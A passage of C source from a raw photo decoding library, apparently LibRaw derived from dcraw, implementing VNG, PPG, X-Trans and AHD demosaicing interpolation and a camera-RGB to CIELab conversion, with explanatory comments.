shift = (y==0) + (x==0);
color = fcol(row+y,col+x);
if (color == f) continue;
*ip++ = (width*y + x)*4 + color;
*ip++ = shift;
*ip++ = color;
sum[color] += 1 << shift;
}
code[row][col][0] = (ip - code[row][col]) / 3;
FORCC
if (c != f) {
*ip++ = c;
*ip++ = sum[c]>0?256 / sum[c]:0;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,1,3);
#endif
lin_interpolate_loop(code,size);
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,2,3);
#endif
}
/*
This algorithm is officially called:
"Interpolation using a Threshold-based variable number of gradients"
described in http://scien.stanford.edu/pages/labsite/1999/psych221/projects/99/tingchen/algodep/vargra.html
I've extended the basic idea to work with non-Bayer filter arrays.
Gradients are numbered clockwise from NW=0 to W=7.
*/
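/* Rough flow: per-pixel gradients are accumulated in eight directions from the
   precomputed terms[] table, a threshold is set between their minimum and
   maximum, and all directions whose gradient falls below the threshold are
   averaged to estimate the missing colors. */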
void CLASS vng_interpolate()
{
static const signed char *cp, terms[] = {
-2,-2,+0,-1,0,0x01, -2,-2,+0,+0,1,0x01, -2,-1,-1,+0,0,0x01,
-2,-1,+0,-1,0,0x02, -2,-1,+0,+0,0,0x03, -2,-1,+0,+1,1,0x01,
-2,+0,+0,-1,0,0x06, -2,+0,+0,+0,1,0x02, -2,+0,+0,+1,0,0x03,
-2,+1,-1,+0,0,0x04, -2,+1,+0,-1,1,0x04, -2,+1,+0,+0,0,0x06,
-2,+1,+0,+1,0,0x02, -2,+2,+0,+0,1,0x04, -2,+2,+0,+1,0,0x04,
-1,-2,-1,+0,0,-128, -1,-2,+0,-1,0,0x01, -1,-2,+1,-1,0,0x01,
-1,-2,+1,+0,1,0x01, -1,-1,-1,+1,0,-120, -1,-1,+1,-2,0,0x40,
-1,-1,+1,-1,0,0x22, -1,-1,+1,+0,0,0x33, -1,-1,+1,+1,1,0x11,
-1,+0,-1,+2,0,0x08, -1,+0,+0,-1,0,0x44, -1,+0,+0,+1,0,0x11,
-1,+0,+1,-2,1,0x40, -1,+0,+1,-1,0,0x66, -1,+0,+1,+0,1,0x22,
-1,+0,+1,+1,0,0x33, -1,+0,+1,+2,1,0x10, -1,+1,+1,-1,1,0x44,
-1,+1,+1,+0,0,0x66, -1,+1,+1,+1,0,0x22, -1,+1,+1,+2,0,0x10,
-1,+2,+0,+1,0,0x04, -1,+2,+1,+0,1,0x04, -1,+2,+1,+1,0,0x04,
+0,-2,+0,+0,1,-128, +0,-1,+0,+1,1,-120, +0,-1,+1,-2,0,0x40,
+0,-1,+1,+0,0,0x11, +0,-1,+2,-2,0,0x40, +0,-1,+2,-1,0,0x20,
+0,-1,+2,+0,0,0x30, +0,-1,+2,+1,1,0x10, +0,+0,+0,+2,1,0x08,
+0,+0,+2,-2,1,0x40, +0,+0,+2,-1,0,0x60, +0,+0,+2,+0,1,0x20,
+0,+0,+2,+1,0,0x30, +0,+0,+2,+2,1,0x10, +0,+1,+1,+0,0,0x44,
+0,+1,+1,+2,0,0x10, +0,+1,+2,-1,1,0x40, +0,+1,+2,+0,0,0x60,
+0,+1,+2,+1,0,0x20, +0,+1,+2,+2,0,0x10, +1,-2,+1,+0,0,-128,
+1,-1,+1,+1,0,-120, +1,+0,+1,+2,0,0x08, +1,+0,+2,-1,0,0x40,
+1,+0,+2,+1,0,0x10
}, chood[] = { -1,-1, -1,0, -1,+1, 0,+1, +1,+1, +1,0, +1,-1, 0,-1 };
ushort (*brow[5])[4], *pix;
int prow=8, pcol=2, *ip, *code[16][16], gval[8], gmin, gmax, sum[4];
int row, col, x, y, x1, x2, y1, y2, t, weight, grads, color, diag;
int g, diff, thold, num, c;
lin_interpolate();
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("VNG interpolation...\n"));
#endif
if (filters == 1) prow = pcol = 16;
if (filters == 9) prow = pcol = 6;
ip = (int *) calloc (prow*pcol, 1280);
merror (ip, "vng_interpolate()");
for (row=0; row < prow; row++) /* Precalculate for VNG */
for (col=0; col < pcol; col++) {
code[row][col] = ip;
for (cp=terms, t=0; t < 64; t++) {
y1 = *cp++; x1 = *cp++;
y2 = *cp++; x2 = *cp++;
weight = *cp++;
grads = *cp++;
color = fcol(row+y1,col+x1);
if (fcol(row+y2,col+x2) != color) continue;
diag = (fcol(row,col+1) == color && fcol(row+1,col) == color) ? 2:1;
if (abs(y1-y2) == diag && abs(x1-x2) == diag) continue;
*ip++ = (y1*width + x1)*4 + color;
*ip++ = (y2*width + x2)*4 + color;
*ip++ = weight;
for (g=0; g < 8; g++)
if (grads & 1<<g) *ip++ = g;
*ip++ = -1;
}
*ip++ = INT_MAX;
for (cp=chood, g=0; g < 8; g++) {
y = *cp++; x = *cp++;
*ip++ = (y*width + x) * 4;
color = fcol(row,col);
if (fcol(row+y,col+x) != color && fcol(row+y*2,col+x*2) == color)
*ip++ = (y*width + x) * 8 + color;
else
*ip++ = 0;
}
}
brow[4] = (ushort (*)[4]) calloc (width*3, sizeof **brow);
merror (brow[4], "vng_interpolate()");
for (row=0; row < 3; row++)
brow[row] = brow[4] + row*width;
for (row=2; row < height-2; row++) { /* Do VNG interpolation */
#ifdef LIBRAW_LIBRARY_BUILD
if(!((row-2)%256))RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,(row-2)/256+1,((height-3)/256)+1);
#endif
for (col=2; col < width-2; col++) {
pix = image[row*width+col];
ip = code[row % prow][col % pcol];
memset (gval, 0, sizeof gval);
while ((g = ip[0]) != INT_MAX) { /* Calculate gradients */
diff = ABS(pix[g] - pix[ip[1]]) << ip[2];
gval[ip[3]] += diff;
ip += 5;
if ((g = ip[-1]) == -1) continue;
gval[g] += diff;
while ((g = *ip++) != -1)
gval[g] += diff;
}
ip++;
gmin = gmax = gval[0]; /* Choose a threshold */
for (g=1; g < 8; g++) {
if (gmin > gval[g]) gmin = gval[g];
if (gmax < gval[g]) gmax = gval[g];
}
if (gmax == 0) {
memcpy (brow[2][col], pix, sizeof *image);
continue;
}
thold = gmin + (gmax >> 1);
memset (sum, 0, sizeof sum);
color = fcol(row,col);
for (num=g=0; g < 8; g++,ip+=2) { /* Average the neighbors */
if (gval[g] <= thold) {
FORCC
if (c == color && ip[1])
sum[c] += (pix[c] + pix[ip[1]]) >> 1;
else
sum[c] += pix[ip[0] + c];
num++;
}
}
FORCC { /* Save to buffer */
t = pix[color];
if (c != color)
t += (sum[c] - sum[color]) / num;
brow[2][col][c] = CLIP(t);
}
}
if (row > 3) /* Write buffer to image */
memcpy (image[(row-2)*width+2], brow[0]+2, (width-4)*sizeof *image);
for (g=0; g < 4; g++)
brow[(g-1) & 3] = brow[g];
}
memcpy (image[(row-2)*width+2], brow[0]+2, (width-4)*sizeof *image);
memcpy (image[(row-1)*width+2], brow[1]+2, (width-4)*sizeof *image);
free (brow[4]);
free (code[0][0]);
}
/*
Patterned Pixel Grouping Interpolation by Alain Desbiolles
*/
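/* Rough flow: greens are filled first from gradient-weighted guesses along the
   lower-gradient axis, then red/blue are computed at green sites, and finally
   blue at red sites (and vice versa) along the lower-gradient diagonal. */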
void CLASS ppg_interpolate()
{
int dir[5] = { 1, width, -1, -width, 1 };
int row, col, diff[2], guess[2], c, d, i;
ushort (*pix)[4];
border_interpolate(3);
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("PPG interpolation...\n"));
#endif
/* Fill in the green layer with gradients and pattern recognition: */
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,0,3);
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel for default(shared) private(guess, diff, row, col, d, c, i, pix) schedule(static)
#endif
#endif
for (row=3; row < height-3; row++)
for (col=3+(FC(row,3) & 1), c=FC(row,col); col < width-3; col+=2) {
pix = image + row*width+col;
for (i=0; (d=dir[i]) > 0; i++) {
guess[i] = (pix[-d][1] + pix[0][c] + pix[d][1]) * 2
- pix[-2*d][c] - pix[2*d][c];
diff[i] = ( ABS(pix[-2*d][c] - pix[ 0][c]) +
ABS(pix[ 2*d][c] - pix[ 0][c]) +
ABS(pix[ -d][1] - pix[ d][1]) ) * 3 +
( ABS(pix[ 3*d][1] - pix[ d][1]) +
ABS(pix[-3*d][1] - pix[-d][1]) ) * 2;
}
d = dir[i = diff[0] > diff[1]];
pix[0][1] = ULIM(guess[i] >> 2, pix[d][1], pix[-d][1]);
}
/* Calculate red and blue for each green pixel: */
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,1,3);
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel for default(shared) private(guess, diff, row, col, d, c, i, pix) schedule(static)
#endif
#endif
for (row=1; row < height-1; row++)
for (col=1+(FC(row,2) & 1), c=FC(row,col+1); col < width-1; col+=2) {
pix = image + row*width+col;
for (i=0; (d=dir[i]) > 0; c=2-c, i++)
pix[0][c] = CLIP((pix[-d][c] + pix[d][c] + 2*pix[0][1]
- pix[-d][1] - pix[d][1]) >> 1);
}
/* Calculate blue for red pixels and vice versa: */
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,2,3);
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel for default(shared) private(guess, diff, row, col, d, c, i, pix) schedule(static)
#endif
#endif
for (row=1; row < height-1; row++)
for (col=1+(FC(row,1) & 1), c=2-FC(row,col); col < width-1; col+=2) {
pix = image + row*width+col;
for (i=0; (d=dir[i]+dir[i+1]) > 0; i++) {
diff[i] = ABS(pix[-d][c] - pix[d][c]) +
ABS(pix[-d][1] - pix[0][1]) +
ABS(pix[ d][1] - pix[0][1]);
guess[i] = pix[-d][c] + pix[d][c] + 2*pix[0][1]
- pix[-d][1] - pix[d][1];
}
if (diff[0] != diff[1])
pix[0][c] = CLIP(guess[diff[0] > diff[1]] >> 1);
else
pix[0][c] = CLIP((guess[0]+guess[1]) >> 2);
}
}
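/* cielab(): camera RGB -> CIELab. A call with rgb == 0 precomputes the
   xyz_cam matrix and a cube-root lookup table; later calls convert one pixel
   using the usual L*a*b* formulas, scaled for storage in shorts. */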
void CLASS cielab (ushort rgb[3], short lab[3])
{
int c, i, j, k;
float r, xyz[3];
#ifdef LIBRAW_NOTHREADS
static float cbrt[0x10000], xyz_cam[3][4];
#else
#define cbrt tls->ahd_data.cbrt
#define xyz_cam tls->ahd_data.xyz_cam
#endif
if (!rgb) {
#ifndef LIBRAW_NOTHREADS
if(cbrt[0] < -1.0f)
#endif
for (i=0; i < 0x10000; i++) {
r = i / 65535.0;
cbrt[i] = r > 0.008856 ? pow(r,1.f/3.0f) : 7.787f*r + 16.f/116.0f;
}
for (i=0; i < 3; i++)
for (j=0; j < colors; j++)
for (xyz_cam[i][j] = k=0; k < 3; k++)
xyz_cam[i][j] += xyz_rgb[i][k] * rgb_cam[k][j] / d65_white[i];
return;
}
xyz[0] = xyz[1] = xyz[2] = 0.5;
FORCC {
xyz[0] += xyz_cam[0][c] * rgb[c];
xyz[1] += xyz_cam[1][c] * rgb[c];
xyz[2] += xyz_cam[2][c] * rgb[c];
}
xyz[0] = cbrt[CLIP((int) xyz[0])];
xyz[1] = cbrt[CLIP((int) xyz[1])];
xyz[2] = cbrt[CLIP((int) xyz[2])];
lab[0] = 64 * (116 * xyz[1] - 16);
lab[1] = 64 * 500 * (xyz[0] - xyz[1]);
lab[2] = 64 * 200 * (xyz[1] - xyz[2]);
#ifndef LIBRAW_NOTHREADS
#undef cbrt
#undef xyz_cam
#endif
}
#define TS 512 /* Tile Size */
#define fcol(row,col) xtrans[(row+6) % 6][(col+6) % 6]
/*
Frank Markesteijn's algorithm for Fuji X-Trans sensors
*/
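/* Rough flow: greens are interpolated along several directions per tile,
   red/blue are propagated through the hexagon neighbor tables (allhex), the
   candidates are compared in CIELab, and a homogeneity map selects the best
   direction(s) for the final blend. */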
void CLASS xtrans_interpolate (int passes)
{
int c, d, f, g, h, i, v, ng, row, col, top, left, mrow, mcol;
#ifdef LIBRAW_LIBRARY_BUILD
int cstat[4]={0,0,0,0};
#endif
int val, ndir, pass, hm[8], avg[4], color[3][8];
static const short orth[12] = { 1,0,0,1,-1,0,0,-1,1,0,0,1 },
patt[2][16] = { { 0,1,0,-1,2,0,-1,0,1,1,1,-1,0,0,0,0 },
{ 0,1,0,-2,1,0,-2,0,1,1,-2,-2,1,-1,-1,1 } },
dir[4] = { 1,TS,TS+1,TS-1 };
short allhex[3][3][2][8], *hex;
ushort min, max, sgrow, sgcol;
ushort (*rgb)[TS][TS][3], (*rix)[3], (*pix)[4];
short (*lab) [TS][3], (*lix)[3];
float (*drv)[TS][TS], diff[6], tr;
char (*homo)[TS][TS], *buffer;
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("%d-pass X-Trans interpolation...\n"), passes);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if(width < TS || height < TS)
throw LIBRAW_EXCEPTION_IO_CORRUPT; // too small image
/* Check against right pattern */
for (row = 0; row < 6; row++)
for (col = 0; col < 6; col++)
cstat[fcol(row,col)]++;
if(cstat[0] < 6 || cstat[0]>10 || cstat[1]< 16
|| cstat[1]>24 || cstat[2]< 6 || cstat[2]>10 || cstat[3])
throw LIBRAW_EXCEPTION_IO_CORRUPT;
// Init allhex table to unreasonable values
for(int i = 0; i < 3; i++)
for(int j = 0; j < 3; j++)
for(int k = 0; k < 2; k++)
for(int l = 0; l < 8; l++)
allhex[i][j][k][l]=32700;
#endif
cielab (0,0);
ndir = 4 << (passes > 1);
buffer = (char *) malloc (TS*TS*(ndir*11+6));
merror (buffer, "xtrans_interpolate()");
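  /* Carve the single TS*TS*(ndir*11+6) byte allocation into per-tile planes:
     rgb  - ndir planes of ushort[TS][TS][3] (ndir*6 bytes per pixel),
     lab  - one plane of short[TS][TS][3]    (6 bytes per pixel),
     drv  - ndir planes of float[TS][TS]     (ndir*4 bytes per pixel),
     homo - ndir planes of char[TS][TS]      (ndir*1 byte per pixel). */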
rgb = (ushort(*)[TS][TS][3]) buffer;
lab = (short (*) [TS][3])(buffer + TS*TS*(ndir*6));
drv = (float (*)[TS][TS]) (buffer + TS*TS*(ndir*6+6));
homo = (char (*)[TS][TS]) (buffer + TS*TS*(ndir*10+6));
int minv=0,maxv=0,minh=0,maxh=0;
/* Map a green hexagon around each non-green pixel and vice versa: */
for (row=0; row < 3; row++)
for (col=0; col < 3; col++)
for (ng=d=0; d < 10; d+=2) {
g = fcol(row,col) == 1;
if (fcol(row+orth[d],col+orth[d+2]) == 1) ng=0; else ng++;
if (ng == 4) { sgrow = row; sgcol = col; }
if (ng == g+1) FORC(8) {
v = orth[d ]*patt[g][c*2] + orth[d+1]*patt[g][c*2+1];
h = orth[d+2]*patt[g][c*2] + orth[d+3]*patt[g][c*2+1];
minv=MIN(v,minv);
maxv=MAX(v,maxv);
	minh=MIN(h,minh);
	maxh=MAX(h,maxh);
allhex[row][col][0][c^(g*2 & d)] = h + v*width;
allhex[row][col][1][c^(g*2 & d)] = h + v*TS;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
// Check allhex table initialization
for(int i = 0; i < 3; i++)
for(int j = 0; j < 3; j++)
for(int k = 0; k < 2; k++)
for(int l = 0; l < 8; l++)
if(allhex[i][j][k][l]>maxh+maxv*width+1 || allhex[i][j][k][l]<minh+minv*width-1)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
int retrycount = 0;
#endif
/* Set green1 and green3 to the minimum and maximum allowed values: */
for (row=2; row < height-2; row++)
for (min=~(max=0), col=2; col < width-2; col++) {
if (fcol(row,col) == 1 && (min=~(max=0))) continue;
pix = image + row*width + col;
hex = allhex[row % 3][col % 3][0];
if (!max) FORC(6) {
val = pix[hex[c]][1];
if (min > val) min = val;
if (max < val) max = val;
}
pix[0][1] = min;
pix[0][3] = max;
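      /* Depending on the row's position within the 3-row X-Trans period, revisit an
	 adjacent row/column so min/max green limits get set for every pixel; in the
	 LibRaw build the retrycount guard below aborts on corrupted patterns that
	 would otherwise make this row/col juggling loop forever. */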
switch ((row-sgrow) % 3) {
case 1: if (row < height-3) { row++; col--; } break;
case 2:
if ((min = ~(max = 0)) && (col += 2) < width - 3 && row > 2)
{
row--;
#ifdef LIBRAW_LIBRARY_BUILD
if(retrycount++ > width*height)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
}
}
}
for (top=3; top < height-19; top += TS-16)
for (left=3; left < width-19; left += TS-16) {
mrow = MIN (top+TS, height-3);
mcol = MIN (left+TS, width-3);
for (row=top; row < mrow; row++)
for (col=left; col < mcol; col++)
memcpy (rgb[0][row-top][col-left], image[row*width+col], 6);
FORC3 memcpy (rgb[c+1], rgb[0], sizeof *rgb);
/* Interpolate green horizontally, vertically, and along both diagonals: */
for (row=top; row < mrow; row++)
for (col=left; col < mcol; col++) {
if ((f = fcol(row,col)) == 1) continue;
pix = image + row*width + col;
hex = allhex[row % 3][col % 3][0];
color[1][0] = 174 * (pix[ hex[1]][1] + pix[ hex[0]][1]) -
46 * (pix[2*hex[1]][1] + pix[2*hex[0]][1]);
color[1][1] = 223 * pix[ hex[3]][1] + pix[ hex[2]][1] * 33 +
92 * (pix[ 0 ][f] - pix[ -hex[2]][f]);
FORC(2) color[1][2+c] =
164 * pix[hex[4+c]][1] + 92 * pix[-2*hex[4+c]][1] + 33 *
(2*pix[0][f] - pix[3*hex[4+c]][f] - pix[-3*hex[4+c]][f]);
FORC4 rgb[c^!((row-sgrow) % 3)][row-top][col-left][1] =
LIM(color[1][c] >> 8,pix[0][1],pix[0][3]);
}
for (pass=0; pass < passes; pass++) {
if (pass == 1)
memcpy (rgb+=4, buffer, 4*sizeof *rgb);
/* Recalculate green from interpolated values of closer pixels: */
if (pass) {
for (row=top+2; row < mrow-2; row++)
for (col=left+2; col < mcol-2; col++) {
if ((f = fcol(row,col)) == 1) continue;
pix = image + row*width + col;
hex = allhex[row % 3][col % 3][1];
for (d=3; d < 6; d++) {
rix = &rgb[(d-2)^!((row-sgrow) % 3)][row-top][col-left];
val = rix[-2*hex[d]][1] + 2*rix[hex[d]][1]
- rix[-2*hex[d]][f] - 2*rix[hex[d]][f] + 3*rix[0][f];
rix[0][1] = LIM(val/3,pix[0][1],pix[0][3]);
}
}
}
/* Interpolate red and blue values for solitary green pixels: */
for (row=(top-sgrow+4)/3*3+sgrow; row < mrow-2; row+=3)
for (col=(left-sgcol+4)/3*3+sgcol; col < mcol-2; col+=3) {
rix = &rgb[0][row-top][col-left];
h = fcol(row,col+1);
memset (diff, 0, sizeof diff);
for (i=1, d=0; d < 6; d++, i^=TS^1, h^=2) {
for (c=0; c < 2; c++, h^=2) {
g = 2*rix[0][1] - rix[i<<c][1] - rix[-i<<c][1];
color[h][d] = g + rix[i<<c][h] + rix[-i<<c][h];
if (d > 1)
diff[d] += SQR (rix[i<<c][1] - rix[-i<<c][1]
- rix[i<<c][h] + rix[-i<<c][h]) + SQR(g);
}
if (d > 1 && (d & 1))
if (diff[d-1] < diff[d])
FORC(2) color[c*2][d] = color[c*2][d-1];
if (d < 2 || (d & 1)) {
FORC(2) rix[0][c*2] = CLIP(color[c*2][d]/2);
rix += TS*TS;
}
}
}
/* Interpolate red for blue pixels and vice versa: */
for (row=top+3; row < mrow-3; row++)
for (col=left+3; col < mcol-3; col++) {
if ((f = 2-fcol(row,col)) == 1) continue;
rix = &rgb[0][row-top][col-left];
c = (row-sgrow) % 3 ? TS:1;
h = 3 * (c ^ TS ^ 1);
for (d=0; d < 4; d++, rix += TS*TS) {
i = d > 1 || ((d ^ c) & 1) ||
((ABS(rix[0][1]-rix[c][1])+ABS(rix[0][1]-rix[-c][1])) <
2*(ABS(rix[0][1]-rix[h][1])+ABS(rix[0][1]-rix[-h][1]))) ? c:h;
rix[0][f] = CLIP((rix[i][f] + rix[-i][f] +
2*rix[0][1] - rix[i][1] - rix[-i][1])/2);
}
}
/* Fill in red and blue for 2x2 blocks of green: */
for (row=top+2; row < mrow-2; row++) if ((row-sgrow) % 3)
for (col=left+2; col < mcol-2; col++) if ((col-sgcol) % 3) {
rix = &rgb[0][row-top][col-left];
hex = allhex[row % 3][col % 3][1];
for (d=0; d < ndir; d+=2, rix += TS*TS)
if (hex[d] + hex[d+1]) {
g = 3*rix[0][1] - 2*rix[hex[d]][1] - rix[hex[d+1]][1];
for (c=0; c < 4; c+=2) rix[0][c] =
CLIP((g + 2*rix[hex[d]][c] + rix[hex[d+1]][c])/3);
} else {
g = 2*rix[0][1] - rix[hex[d]][1] - rix[hex[d+1]][1];
for (c=0; c < 4; c+=2) rix[0][c] =
CLIP((g + rix[hex[d]][c] + rix[hex[d+1]][c])/2);
}
}
}
rgb = (ushort(*)[TS][TS][3]) buffer;
mrow -= top;
mcol -= left;
/* Convert to CIELab and differentiate in all directions: */
for (d=0; d < ndir; d++) {
for (row=2; row < mrow-2; row++)
for (col=2; col < mcol-2; col++)
cielab (rgb[d][row][col], lab[row][col]);
for (f=dir[d & 3],row=3; row < mrow-3; row++)
for (col=3; col < mcol-3; col++) {
lix = &lab[row][col];
g = 2*lix[0][0] - lix[f][0] - lix[-f][0];
drv[d][row][col] = SQR(g)
+ SQR((2*lix[0][1] - lix[f][1] - lix[-f][1] + g*500/232))
+ SQR((2*lix[0][2] - lix[f][2] - lix[-f][2] - g*500/580));
}
}
/* Build homogeneity maps from the derivatives: */
memset(homo, 0, ndir*TS*TS);
for (row=4; row < mrow-4; row++)
for (col=4; col < mcol-4; col++) {
for (tr=FLT_MAX, d=0; d < ndir; d++)
if (tr > drv[d][row][col])
tr = drv[d][row][col];
tr *= 8;
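      /* tr is 8x the smallest directional derivative at this pixel; each direction
	 scores one point for every 3x3 neighbour whose derivative stays below it. */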
for (d=0; d < ndir; d++)
for (v=-1; v <= 1; v++)
for (h=-1; h <= 1; h++)
if (drv[d][row+v][col+h] <= tr)
homo[d][row][col]++;
}
/* Average the most homogenous pixels for the final result: */
if (height-top < TS+4) mrow = height-top+2;
if (width-left < TS+4) mcol = width-left+2;
for (row = MIN(top,8); row < mrow-8; row++)
for (col = MIN(left,8); col < mcol-8; col++) {
for (d=0; d < ndir; d++)
for (hm[d]=0, v=-2; v <= 2; v++)
for (h=-2; h <= 2; h++)
hm[d] += homo[d][row+v][col+h];
for (d=0; d < ndir-4; d++)
if (hm[d] < hm[d+4]) hm[d ] = 0; else
if (hm[d] > hm[d+4]) hm[d+4] = 0;
for (max=hm[0],d=1; d < ndir; d++)
if (max < hm[d]) max = hm[d];
max -= max >> 3;
memset (avg, 0, sizeof avg);
for (d=0; d < ndir; d++)
if (hm[d] >= max) {
FORC3 avg[c] += rgb[d][row][col][c];
avg[3]++;
}
FORC3 image[(row+top)*width+col+left][c] = avg[c]/avg[3];
}
}
free(buffer);
border_interpolate(8);
}
#undef fcol
/*
Adaptive Homogeneity-Directed interpolation is based on
the work of Keigo Hirakawa, Thomas Parks, and Paul Lee.
*/
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS ahd_interpolate_green_h_and_v(int top, int left, ushort (*out_rgb)[TS][TS][3])
{
int row, col;
int c, val;
ushort (*pix)[4];
const int rowlimit = MIN(top+TS, height-2);
const int collimit = MIN(left+TS, width-2);
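  /* Plane 0 receives the horizontal and plane 1 the vertical green estimate: the mean
     of the two neighbouring greens plus a Laplacian correction in the pixel's own
     colour channel, clamped between those neighbouring greens. */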
for (row = top; row < rowlimit; row++) {
col = left + (FC(row,left) & 1);
for (c = FC(row,col); col < collimit; col+=2) {
pix = image + row*width+col;
val = ((pix[-1][1] + pix[0][c] + pix[1][1]) * 2
- pix[-2][c] - pix[2][c]) >> 2;
out_rgb[0][row-top][col-left][1] = ULIM(val,pix[-1][1],pix[1][1]);
val = ((pix[-width][1] + pix[0][c] + pix[width][1]) * 2
- pix[-2*width][c] - pix[2*width][c]) >> 2;
out_rgb[1][row-top][col-left][1] = ULIM(val,pix[-width][1],pix[width][1]);
}
}
}
void CLASS ahd_interpolate_r_and_b_in_rgb_and_convert_to_cielab(int top, int left, ushort (*inout_rgb)[TS][3], short (*out_lab)[TS][3])
{
unsigned row, col;
int c, val;
ushort (*pix)[4];
ushort (*rix)[3];
short (*lix)[3];
float xyz[3];
const unsigned num_pix_per_row = 4*width;
const unsigned rowlimit = MIN(top+TS-1, height-3);
const unsigned collimit = MIN(left+TS-1, width-3);
ushort *pix_above;
ushort *pix_below;
int t1, t2;
for (row = top+1; row < rowlimit; row++) {
pix = image + row*width + left;
rix = &inout_rgb[row-top][0];
lix = &out_lab[row-top][0];
for (col = left+1; col < collimit; col++) {
pix++;
pix_above = &pix[0][0] - num_pix_per_row;
pix_below = &pix[0][0] + num_pix_per_row;
rix++;
lix++;
c = 2 - FC(row, col);
if (c == 1) {
c = FC(row+1,col);
t1 = 2-c;
val = pix[0][1] + (( pix[-1][t1] + pix[1][t1]
- rix[-1][1] - rix[1][1] ) >> 1);
rix[0][t1] = CLIP(val);
val = pix[0][1] + (( pix_above[c] + pix_below[c]
- rix[-TS][1] - rix[TS][1] ) >> 1);
} else {
t1 = -4+c; /* -4+c: pixel of color c to the left */
t2 = 4+c; /* 4+c: pixel of color c to the right */
val = rix[0][1] + (( pix_above[t1] + pix_above[t2]
+ pix_below[t1] + pix_below[t2]
- rix[-TS-1][1] - rix[-TS+1][1]
- rix[+TS-1][1] - rix[+TS+1][1] + 1) >> 2);
}
rix[0][c] = CLIP(val);
c = FC(row,col);
rix[0][c] = pix[0][c];
cielab(rix[0],lix[0]);
}
}
}
void CLASS ahd_interpolate_r_and_b_and_convert_to_cielab(int top, int left, ushort (*inout_rgb)[TS][TS][3], short (*out_lab)[TS][TS][3])
{
int direction;
for (direction = 0; direction < 2; direction++) {
ahd_interpolate_r_and_b_in_rgb_and_convert_to_cielab(top, left, inout_rgb[direction], out_lab[direction]);
}
}
void CLASS ahd_interpolate_build_homogeneity_map(int top, int left, short (*lab)[TS][TS][3], char (*out_homogeneity_map)[TS][2])
{
int row, col;
int tr, tc;
int direction;
int i;
short (*lix)[3];
short (*lixs[2])[3];
short *adjacent_lix;
unsigned ldiff[2][4], abdiff[2][4], leps, abeps;
static const int dir[4] = { -1, 1, -TS, TS };
const int rowlimit = MIN(top+TS-2, height-4);
const int collimit = MIN(left+TS-2, width-4);
int homogeneity;
char (*homogeneity_map_p)[2];
memset (out_homogeneity_map, 0, 2*TS*TS);
for (row=top+2; row < rowlimit; row++) {
tr = row-top;
homogeneity_map_p = &out_homogeneity_map[tr][1];
for (direction=0; direction < 2; direction++) {
lixs[direction] = &lab[direction][tr][1];
}
for (col=left+2; col < collimit; col++) {
tc = col-left;
homogeneity_map_p++;
for (direction=0; direction < 2; direction++) {
lix = ++lixs[direction];
for (i=0; i < 4; i++) {
adjacent_lix = lix[dir[i]];
ldiff[direction][i] = ABS(lix[0][0]-adjacent_lix[0]);
abdiff[direction][i] = SQR(lix[0][1]-adjacent_lix[1])
+ SQR(lix[0][2]-adjacent_lix[2]);
}
}
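      /* Adaptive thresholds as in Hirakawa-Parks AHD: the smaller of the larger
	 horizontal L difference (H-interpolated image) and the larger vertical one
	 (V-interpolated image), and likewise for the ab chrominance differences. */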
leps = MIN(MAX(ldiff[0][0],ldiff[0][1]),
MAX(ldiff[1][2],ldiff[1][3]));
abeps = MIN(MAX(abdiff[0][0],abdiff[0][1]),
MAX(abdiff[1][2],abdiff[1][3]));
for (direction=0; direction < 2; direction++) {
homogeneity = 0;
for (i=0; i < 4; i++) {
if (ldiff[direction][i] <= leps && abdiff[direction][i] <= abeps) {
homogeneity++;
}
}
homogeneity_map_p[0][direction] = homogeneity;
}
}
}
}
void CLASS ahd_interpolate_combine_homogeneous_pixels(int top, int left, ushort (*rgb)[TS][TS][3], char (*homogeneity_map)[TS][2])
{
int row, col;
int tr, tc;
int i, j;
int direction;
int hm[2];
int c;
const int rowlimit = MIN(top+TS-3, height-5);
const int collimit = MIN(left+TS-3, width-5);
ushort (*pix)[4];
ushort (*rix[2])[3];
for (row=top+3; row < rowlimit; row++) {
tr = row-top;
pix = &image[row*width+left+2];
for (direction = 0; direction < 2; direction++) {
rix[direction] = &rgb[direction][tr][2];
}
for (col=left+3; col < collimit; col++) {
tc = col-left;
pix++;
for (direction = 0; direction < 2; direction++) {
rix[direction]++;
}
for (direction=0; direction < 2; direction++) {
hm[direction] = 0;
for (i=tr-1; i <= tr+1; i++) {
for (j=tc-1; j <= tc+1; j++) {
hm[direction] += homogeneity_map[i][j][direction];
}
}
}
if (hm[0] != hm[1]) {
memcpy(pix[0], rix[hm[1] > hm[0]][0], 3 * sizeof(ushort));
} else {
FORC3 {
pix[0][c] = (rix[0][0][c] + rix[1][0][c]) >> 1;
}
}
}
}
}
void CLASS ahd_interpolate()
{
int i, j, k, top, left;
float xyz_cam[3][4],r;
char *buffer;
ushort (*rgb)[TS][TS][3];
short (*lab)[TS][TS][3];
char (*homo)[TS][2];
int terminate_flag = 0;
cielab(0,0);
border_interpolate(5);
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel private(buffer,rgb,lab,homo,top,left,i,j,k) shared(xyz_cam,terminate_flag)
#endif
#endif
{
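    /* Two rgb planes (2*6 bytes/pixel), two CIELab planes (2*6 bytes/pixel) and a
       2-byte-per-pixel homogeneity map make up the 26*TS*TS bytes allocated below. */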
    buffer = (char *) malloc (26*TS*TS); /* ~6.5 MB at TS==512 */
merror (buffer, "ahd_interpolate()");
rgb = (ushort(*)[TS][TS][3]) buffer;
lab = (short (*)[TS][TS][3])(buffer + 12*TS*TS);
